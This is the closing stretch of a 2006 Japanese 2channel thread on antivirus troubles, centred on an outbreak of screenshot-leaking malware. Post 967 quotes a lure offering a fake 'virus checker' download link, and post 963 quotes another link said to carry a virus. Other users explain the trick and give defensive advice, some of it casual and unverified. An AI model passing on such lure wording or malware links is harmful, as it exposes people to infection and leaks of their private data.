958 :名無しさん@お腹いっぱい。:2006/08/03(木) 09:46:53
アホ、 そこまで人頼みかい!

959 :名無しさん@お腹いっぱい。:2006/08/03(木) 10:21:52
>>957
気にしない 気にしない
あんたなら何があっても大丈夫だ

960 :名無しさん@お腹いっぱい。:2006/08/03(木) 10:44:22
>>935
ナカーマヽ(・∀・)人(・∀・)ノ
HijackThis使って削除しる!
未だにコイツが何してるのか判らないんだよね(´・ω・`)


961 :名無しさん@お腹いっぱい。:2006/08/03(木) 10:58:51
ウィルス感染ファイル数には1つファイルが印されてるのに、該当するファイルが存在しない。
もう一度ウィルスを検索しても反応がない上に、念のためクリーンナップまでした。
でも、ウィルス感染ファイル数にはまだ1つ印されている。何故だ?

962 :名無しさん@お腹いっぱい。:2006/08/03(木) 12:21:02
隔離してるのかと。隔離したウィルスが安全かどうかは分からんけどね。

963 :名無しさん@お腹いっぱい。:2006/08/03(木) 14:58:35
14 名前:名無しさん@6周年[] 投稿日:2006/08/03(木) 13:50:35 ID:ZEX0FJbq0
驚愕速報!亀田世界戦、ヤクザがジャッジに恫喝!


驚愕速報!!亀田世界戦、判定中のジャッジに対し興業主の山□組(真ん中は□(しかく)と伏字にしてある。)系某団体が恫喝!!

http://www.geocities.jp/kameda_sekaisen_hantei/index.html

↑上記のサイト(>>948と同じものだと思います)がとんでもないウィルスだと芸即住人が言ってたんですが
ネタなんでしょうか? 

964 :名無しさん@お腹いっぱい。:2006/08/03(木) 17:52:06
隔離した感染ファイルはどこに行くのかね?
削除したいし、パソの中にまだウィルスがあると思うとたまらんよ。

965 :名無しさん@お腹いっぱい。:2006/08/03(木) 18:11:32
隔離フォルダー

966 :名無しさん@お腹いっぱい。:2006/08/03(木) 18:54:23
隔離病棟に入院する

967 :名無しさん@お腹いっぱい。:2006/08/03(木) 21:42:20
51 名前:以下、名無しにかわりましてVIPがお送りします[] 投稿日:2006/08/03(木) 18:20:26.50 ID:KHuSt45s0
あーあ。
踏んだ奴どうすんだよ。
じゃあとりあえず俺が山田ウイルスチェッカー張っとく。
心配な奴は解凍して実行しとけ。

ttp://up2.viploader.net/mini/src/viploader57529.lzh

踏んでしまった 助けて 
ホントお願いします

968 :名無しさん@お腹いっぱい。:2006/08/03(木) 22:29:23
>>967
システムの復元

969 :名無しさん@お腹いっぱい。:2006/08/03(木) 22:40:51
>>968
それで直るんだったらアンチウイルスソフト誰も買わないw

970 :名無しさん@お腹いっぱい。:2006/08/03(木) 22:48:17
>>967
firewallソフト導入しな
outpostがおすすめ。
ウイルスの接続だけブロックしな。

971 :名無しさん@お腹いっぱい。:2006/08/03(木) 22:55:47
>>967
バスタとノートンに送っといた
2〜3日で対応するだろう
詳細出るかは知らんが




972 :名無しさん@お腹いっぱい。:2006/08/03(木) 23:03:42
>>970 やってみます
ありがとうございます

>>971 俺マカフィーなんですけど。。。
こういうときどうすればいいのか分からないんです
マカフィーに送ってもらえたりしないですよね?

973 :名無しさん@お腹いっぱい。:2006/08/03(木) 23:26:16
>>967
AVGが対応済み。良かったら使ってみては?

974 :名無しさん@お腹いっぱい。:2006/08/03(木) 23:28:12
ウィルスチェックツールの文にだまされてしまいスクリーンショット流出中です
ウィルスチェックツールの文字に油断し実行した自分が悪いのですが、バスター対応までの応急処置はないでしょうか
昼はネット回線切る訳にいかないので、遅い対応を待ってはいられません・・・

975 :名無しさん@お腹いっぱい。:2006/08/03(木) 23:38:43
そもそも今回の祭りの内容が把握できん
元のlzhかjpgを開いた時点でアウトなのか?

976 :名無しさん@お腹いっぱい。:2006/08/03(木) 23:41:39
ちょっと動向見たけど、思いっきりexeが付いてるヤツを展開してるみたい。
拡張子の偽装はしてないようだ。

977 :名無しさん@お腹いっぱい。:2006/08/03(木) 23:44:44
svchost.exeみて、ユーザー名が自分の名前じゃなきゃ大丈夫なんだよね?
今やってる祭りのウイルスって

978 :名無しさん@お腹いっぱい。:2006/08/03(木) 23:47:15
確か、好きなヤツにはたまらんフォルダ名だったな。
ケツにexeが付いてるけど。拡張子の表示をしてれば怪しむけどね。

979 :名無しさん@お腹いっぱい。:2006/08/03(木) 23:52:20
>>975
1:「ウィルス蔓延中、ウィルスチェックツールでチェックしよう」というレスにZIPファイルのアドレス
2:解凍すると「チェックツール.exe」がある
3:実行して感染、エラーダイアログが延々でる
といった感じです

感染するとスクリーンショットが勝手にアップされ、掲示板に情報を書き込みます

980 :名無しさん@お腹いっぱい。:2006/08/03(木) 23:53:28
>>979
jpg偽装とかはマジであるんか?

981 :名無しさん@お腹いっぱい。:2006/08/03(木) 23:55:39
>>979
悪質な名前になったな。
俺が見たときは、〇〇〇詰め合せ.exeだったよ。
そりゃ感染者も増えるワケだ。

982 :名無しさん@お腹いっぱい。:2006/08/04(金) 00:06:44
>>972
http://www.mcafee.com/japan/security/contactavert.asp

983 :名無しさん@お腹いっぱい。:2006/08/04(金) 00:06:58
俺感染者です
今、何もできず感染してないほうのPCつかってます
とりあえず、どうすりゃいいですか?
ここでも、紹介してもらったfirewallとoutpostで回復しますよね

984 :名無しさん@お腹いっぱい。:2006/08/04(金) 00:07:56
感染してるかどうか見分ける方法ありますか?

985 :970:2006/08/04(金) 00:11:06
>>983
回復と言うかだな、スクリーンショットがupできないようにウイルスがインターネットに接続することを遮断するんだよ。
そうすれば今までどおりインターネットにつないでいい。
後でアンチウイルスソフトが対応した時に駆除すればいい。

986 :名無しさん@お腹いっぱい。:2006/08/04(金) 00:12:54
>>983
とりあえず落ち着け。
OutpostはFirewall。簡単に言うと外部からの侵入と、内部から外部への通信を遮断する役割。
ウイルスそのものを駆除するわけじゃない。

駆除は金子に対応してるアンチウイルスソフトを導入して駆除する。

987 :名無しさん@お腹いっぱい。:2006/08/04(金) 00:15:26
>>985-986 ホントありがとうございます
正直落ち着けないです 手も震えてるし。。。
とりあえずそのソフトを導入してみます
しかし、そのソフトを導入する時には必然的にネットにつながなければいけないので
そのときにSSを撮られるのは諦めるしかないですよね

988 :970:2006/08/04(金) 00:18:25
>>987
違うパソコンからファイルを移動できればいいけど。
ひょっとするとupnpを無効にしてからやると安全かな。
http://journal.mycom.co.jp/column/winxp/128/
をやってみて。

989 :名無しさん@お腹いっぱい。:2006/08/04(金) 00:21:01
>>987
自分がしでかした事だから、作業中のSSがUPされても仕方無い。
まずはAVGとOutpostを入れてみな。
使い方はググって調べるか、各スレを熟読せよ。
これも勉強。頑張れ。

990 :名無しさん@お腹いっぱい。:2006/08/04(金) 00:21:33
>>967のurlを誤って踏んで、開かずに閉じたのですが
感染してしまいますか?

991 :名無しさん@お腹いっぱい。:2006/08/04(金) 00:22:21
拡張子偽装じゃないのか

992 :名無しさん@お腹いっぱい。:2006/08/04(金) 00:22:31
しねーよ

993 :970:2006/08/04(金) 00:22:42
>>990
ok

994 :名無しさん@お腹いっぱい。:2006/08/04(金) 00:24:40
>>988 せっかく色々情報を提供してくださってるんですが・・・・
正直俺が無知なため把握できませんorz
違うパソコンからファイル移動というのは二台ともオンラインしないといけないですよね(一応ググりました
それは不可能なんです。。。
やっぱり、勇気を出してオンラインにしてOutpostやってみます

995 :990:2006/08/04(金) 00:25:14
チキンで申し訳ありませんでした
回答ありがとうございます

996 :名無しさん@お腹いっぱい。:2006/08/04(金) 00:29:57
>>989 これも経験だとおもってやります(少し心配だけど
既に俺のPCにはマカフィーが入っていますがAVGと喧嘩とか大丈夫でしょうか?


997 :970:2006/08/04(金) 00:31:22
>>996
普通は喧嘩する。
使うなら一つだけ。

998 :名無しさん@お腹いっぱい。:2006/08/04(金) 00:32:43
>>997 マカフィー終了してやれば大丈夫ですよね?





次スレはたちませんか。。。

999 :名無しさん@お腹いっぱい。:2006/08/04(金) 00:33:14
つーかAVG対応してるか?
さっきvirustotalにうpしたら検出されなかったぞ


1000 :名無しさん@お腹いっぱい。:2006/08/04(金) 00:34:40
1000ならウイルス作者はタイーホ

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

321 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)